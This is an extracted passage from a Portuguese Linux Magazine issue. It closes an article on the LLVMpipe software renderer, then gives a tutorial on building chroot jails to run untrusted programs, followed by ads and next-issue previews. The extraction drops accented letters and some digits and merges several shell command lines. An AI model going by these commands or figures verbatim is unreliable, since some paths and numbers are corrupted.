Todos estes fatores contribuem para que o LLVMpipe apresente ao menos simples aplicativos 3D suavementena tela. Zack Rusin, desenvolvedor do LLVMpipe, relatou em seu blog que conseguia jogar o Alien Arena [9]em25 frames por segundo em um Xeon E5405 com baixa resoluo. O velho software rasterizador Mesa produziuum slideshow nico em 3,5 frames por segundo, em comparao [10]. Medidas feitas por Michael Larabel do sitePhoronix Internet confirmam esses valores.

Fronted LLVM IROtimizaode cdigo

BackendProgramacompelto


26/29


mais potente (tambm conhecido

como rasterer ou renderizador) [5].

Este renderizador calcula a imagem

de pixel completa a partir dos da-

dos D. Para entregar a imagem o

mais depressa possvel, os clculos

fluem para um programa que, emseguida, permite que o compilador

LLVM os traduza e execute. Paraacelerar ainda mais o processo, o

rasterizador distribui os clculosem todos os cores disponveis do

processador. O resultado surge com

o nome de LLVMpipe [6].

ConclusoO LLVMpipe provavelmente no

poder controlar uma placa grficaD com um driver posteriormente

otimizado porque o processadorprincipal precisar lidar com muitas

tarefas, ao passo que a placa grfica

D projetada e otimizada para o

processamento rpido de grficosD. Alm disso, o trabalho com oLLVMpipe continua, com algumas

funes aguardando implementao.

O LLVMpipe, portanto, contar como

uma espcie de ltimo recurso, mas

seu desempenho adequado para

interfaces grficas e aplicativos D

simples, como prova a combinao

do Ubuntu . com Unity.n

Mais informaes[1]Khronos Group: http://www.khronos.org

[2]Mesa: http://www.mesa3d.org

[3]Gallium3D:http://freedesktop.org/wiki/Software/gallium/

[4]OpenVG at Wikipedia:http://en.wikipedia.org/wiki/OpenVG/

[5]Rasterization at Wikipedia:http://en.wikipedia.org/wiki/Rasterisation/

[6]LLVMpipe: http://www.mesa3d.org/llvmpipe.html

[7]LLVM: http://www.llvm.org

[8]Just-in-time compilation at Wikipedia:http://en.wikipedia.org/wiki/Just-in-time_compilation

[9]Alien Arena: http://red.planetarena.org

[10]The software renderer by Zack Rusin:http://zrusin.blogspot.de/2010/03/software-renderer.html

[11]LLVMpipe Still Doesnt Work For Linux Gaming; by Michael Larabel:http://www.phoronix.com/scan.php?page=news_item&px=MTEwODM

Disponvel no site

www.LinuxMagazine.com.br

Instalao e congifurao deservidores VoIP com Asterisk.

Configurao de ramais,

extenses, secretria eletrnica,monitoramento e espionagemde chamadas, planos dediscagem, URA e muitos outrosaspectos que abordam o uso decentrais telefnicas IP PBX.

Coleo

Academy!




27/29


Priso privadaVirtualizar bom, mas s vezes pode ser um exagero, se tudo o que o usurio quiser fazer for executar um programaque poderia representar uma ameaa ao sistema. O chroot jails oferece uma alternativa leve, rpida e bem testada.por Paul C. Brown

Uma das coisas mais perigosas

que o usurio pode fazer no

sistema executar software

baixado da Internet a partir de um

site desconhecido ou ainda aplicativos

que no foram testados e que podem

conter erros fatais. Em ambos os casos,nunca aconselhvel arriscar dados

e hardware, executando aplicativos

duvidosos diretamente no sistema

utilizado diariamente para trabalho

e lazer. No entanto, o usurio no

precisa desistir de experimentar um

novo software. Poderia at ser uma

exigncia de trabalho, caso em que

o usurio trabalha na rea de TI de-

senvolvendo cdigo potencialmente

perigoso e, sejamos francos, todo o

cdigo experimental potencialmen-

te perigoso. No Linux, podemos criar

um ambiente fechado e controlado

para fazer estas coisas, e exatamente

sobre o que se trata o chroot.

Espao pessoalUsar ochroot de certa forma semelhan-

te a virtualizar um sistema, mas muito

mais limitado em termos de escopo.

Ao invs de recriar um sistema de com-

putador inteiro, ochrootpermite que ousurio crie um Shell do convidado e

um sistema de arquivos (inicialmente)

vazio em um diretrio favorito em sua

prpria rvore de diretrios.

O sistema convidado herda algu-

mas das caractersticas do sistema de

host sabidamente, o kernel e a maior

parte das variveis de ambiente mas

a rvore de diretrios desaparece,

juntamente com todos os comandos,

bibliotecas compartilhadas, diretrios

do dispositivo e outros recursos. Den-

tro desta ficha limpa de um sistema,

criamos um novo sistema de arquivos a

partir do zero, contendo apenas o que

necessrio para executar o aplicativo

que temos que testar; da o seu nome:

para todos os efeitos prticos, muda-mos o local do diretrio raiz.

Depois de haver decidido onde

ficar a chroot jail,o usurio pode

comear a copiar software para criar

um ambiente seguro. Devido s ca-

ractersticas deste tipo de ambiente,

altamente improvvel que o sistema

host ser afetado se alguma coisa der

errado. Por exemplo, quase impossvel

que aplicativos jailed modifiquem ou

apaguem arquivos de fora do chroot

no sistema host sendo o quase uma

palavra importante na frase anterior.

Compilando o jailCompilar um chroot jail muito

simples. Tudo o que o usurio tem

a fazer criar um novo diretrio e

apontar o chrootpara ele:

$ mkdir myjail$ sudo chroot myjail

Note que, embora o diretriopossa pertencer ao prprio usu-

rio, o chroots pode ser executado

com privilgios de superusurio,

da o sudono incio da linha.

No entanto, a entrada das duas linhas

anteriores s levar a um erro como:

chroot: failed to runcommand '/bin/bash':No such file or directory

Isso acontece porque o Shell Bash

como qualquer outro programa

e, quando o sistema tenta acessar

um Shell de dentro do jail, ele no o

encontra e quebra. Assim, o prximo

passo a criao de um programa

de Shell de dentro do jail.

Para isso, a primeira coisa a fazer

criar um diretrio bin(que ondeos programas executveis essenciais

de um sistema Linux geralmente se

encontram) no diretrio de teste e

copiar o bash do do /bindo host:

$ mkdir myjail/bin$ cp bin/bash myjail/bin

Podemos pensar que isso sufi-

ciente, mas, se tentarmos o chroot

novamente, ele retornar o mesmo

que antes, porque o Bash depende

de vrios outros arquivos que conte-

nham cdigo chamado de bibliote-

cas, que so necessrias para fazer o

trabalho. O usurio precisa descobrir

qual deles deve selecionar e copi-

-los para jail. Note que, de dentro do

jail, o resto do sistema invisvel, e o

usurio no pode acessar qualquer

Segurana

Listagem 1: Bibliotecasdependentes do Bash$ ldd /bin/bashlinux-vdso.so.1(0x00007fff10576000)libreadline.so.6 => /lib64/libreadline.so.6(0x00007fa02c744000)libtinfo.so.5 => /lib64/libtinfo.so.5(0x00007fa02c511000)libdl.so.2 => /lib64/libdl.so.2 (0x00007fa02c30d000)libc.so.6 => /lib64/libc.so.6(0x00007fa02bf60000)/lib64/ld-linux-x86-64.so.2(0x00007fa02c98c000)


28/29


arquivo do exterior, incluindo essas

bibliotecas muito importantes.

Para descobrir quais bibliotecas o

Bash necessita, podemos usar o co-

mandoldd. A sintaxe muito simples:

tudo o que temos a fazer passar o

caminho e o nome do aplicativo quedesejamos verificar. Na listagem 1,

estamos executando lddpara Bash,

que retorna uma lista de bibliotecas

e onde elas esto instaladas. Observe

que a maioria reside em um diretrio

chamadolib64/, vinculado ao diret-

rio raiz (/). O 64indica que estamos

usando um sistema de bits. Se o

usurio estiver utilizando um sistema

de bits, o diretrio ser simples-

mente chamado de lib/.O primeiro item da lista, linux-vd-

so.so.1 (0x00007fff10576000), uma

biblioteca virtual usada em alguns

sistemas Linux, e podemos ignor-la

sumariamente. O restante das linhas

aponta para bibliotecas reais que

temos que copiar para um diretrio

com o mesmo nome no chroot jail:

$ mkdir myjail/lib64$ cp /lib64/libreadline.so.6 myjail/lib/

$ cp /lib64/libtinfo.so.5 myjail/lib/...

...e assim por diante. Depois de copiar

todos os arquivos, podemos testar

o jail novamente:

sudo chroot myjail/Password:bash-4.2#

Sucesso! O fato de agora termos

um prompt mostra que tudo est

funcionando como deveria. No en-tanto, logo iremos nos deparar com

algumas limitaes. Embora possa-

mos acessar os diretrios /bine /lib

que criamos no jail com o comandocd

e talvez copiar e mover arquivos para

ele, no podemos fazer muito mais

do que isso. No podemos nem listar

o contedo dos diretrios (embora

possamos usar o comando pwdpara

ver onde nos encontramos dentro da

rvore de diretrios).

Isso porque, enquanto cde pwd

so comandos integrados no Bash

conhecidos como builtin commands

o ls, programa utilizado para listar

o contedo do diretrio, no . Para

usar o ls, temos que passar por um

processo semelhante ao qual pas-samos para fazer com que o Bash

funcione, incluindo copiar todas as

bibliotecas das quais ele depende.

Para comear, saia do jail com:

bash-4.1# exit

em seguida, verifique a listagem 2

para ver como ele criado, a entrada

est em negrito). A lista de biblio-

tecas pode variar de sistema para

sistema. Algumas das bibliotecas

j esto no diretrio mijail/lib64,

assim, podemos ignor-las. Umavez concludo o processo, o usu-

rio ser capaz de usar lscomo faria

no sistema host. E isso tudo o que

podemos fazer com este comando.

O processo pode ficar muito mais

complicado se o usurio pretender

utilizar o jail com programas mais

complexos, por isso leia com aten-

o o quadro 1, que contm algumas

dicas sobre como fazer as coisas

funcionarem sem problemas.n

Listagem 2: Como fazer o lsfuncionar no jail01$ cp /bin/ls myjail/bin/02$ ldd /bin/ls03linux-vdso.so.1 =>

(0x00007ffffcb35000)04libselinux.so.1 => /lib64/

libselinux.so.1(0x00000036e3c00000)

05librt.so.1 => /lib64/librt.so.1(0x00000036e3400000)

06libcap.so.2 => /lib64/libcap.so.2(0x00000036ecc00000)07libacl.so.1 => /lib64/libacl.so.1

(0x00000036f1400000)08libc.so.6 => /lib64/libc.so.6

(0x00000036e1c00000)09libdl.so.2 => /lib64/libdl.so.2

(0x00000036e2000000)10/lib64/ld-linux-x86-64.so.2

(0x00000036e1800000)11libpthread.so.0 => /lib64/

libpthread.so.0(0x00000036e2400000)

12libattr.so.1 => /lib64/libattr.so.1 (0x00000036ef000000)

13$ cp /lib64/libselinux.so.1

myjail/lib64/14$ cp /lib64/librt.so.1 myjail/lib64/15$ cp /lib64/libcap.so.2 myjail/

lib64/16$ cp /lib64/libacl.so.1 myjail/

lib64/17$ cp /lib64/libpthread.so.0

myjail/lib64/18$ cp /lib64/libattr.so.1 myjail/

lib64/19$ sudo chroot myjail20Password:21bash-4.1# ls22bin lib6423bash-4.1#

Quadro 1:Como executaraplicativos complexos

Se o usurio quiser executaraplicativos que so muito maiscomplexos do que o ls em umchroot jail, logo ir descobrir queter que incluir diretrios inteirosantes que tudo funcione. O quetorna as coisas ainda mais difceis descobrir que alguns destes di-retrios, como /proc, /deve /sysnem sequer contm arquivos esubdiretrios reais, mas virtuais.

Arquivos como /dev/sdaou/proc/cpuinfono apontam paradados reais no disco rgido, mas

so criados quando h o bootdo sistema ou mesmo quando osistema est em execuo e nopode ser copiado ou movido. Elestambm no podem ser vinculadosaoln-sporque, como mencionadoanteriormente, o resto do sistemaalm do jail invisvel de dentrodele, logo, os links para arquivose diretrios fora do jail aparecemcomo quebrados.

Felizmente, h uma soluo paraeste problema. Usando a opo decomando mount -o bind, o usuriopode vincular diretrios para seu

diretrio e eles ainda estaro dispo-nveis quando executarmoschroot:

$ cd myjail$ mkdir proc$ mkdir dev$ mount -o bind /proc proc$ mount -o bind /dev dev

Mas, ateno: use este mtodocom moderao, se o seu objetivofor criar um ambiente isolado, poiso comandomount -o bindabrir umgrande buraco nas paredes do jail.


29/29


GEDDocumentos formam a grande massa

de conhecimentos de uma empresa.

Um sistema GED (Gesto Eletrnica de

Documentos) permite preservar esse

patrimnio e organizar eletronicamente adocumentao, para assegurar a informaonecessria, na hora exata, para a pessoa certa.Na prxima edio daLinux Magazine, voc

vai conhecer o sistema GED Alfresco, querevolucionou o mercado de colaborao

e compartilhamento de documentos em

uma rede empresarial e poder ser o mais

novo e fiel amigo de usurios que precisamarmazenar digitalmente documentos

importantes, colaborar em equipe atravsdo compartilhamento monitorado de

contedo e gerenciar como um todo as

informaes trocadas entre membros de

uma empresa. n

OpenStack

Capaz de gernciar os componentes

de mltiplas instncias virtualizadas,

o OpenStack um dos queridinhos

dos profissionais de infraestrutura evirtualizao da atualidade. livre, nopossui restries quanto quantida-

de de instncias e uma plataforma

robusta, extremamente til nestes

tempos onde o advento da computa-

o em nuvem j uma realidade. Naprxima edio da Admin Magazine

voc vai conhecer tudo o que essa in-

crvel ferramenta pode fazer por voc!No perca! n

Linux Magazine #107

Admin Magazine #10

Preview

linux new mwdia - segurança

Documents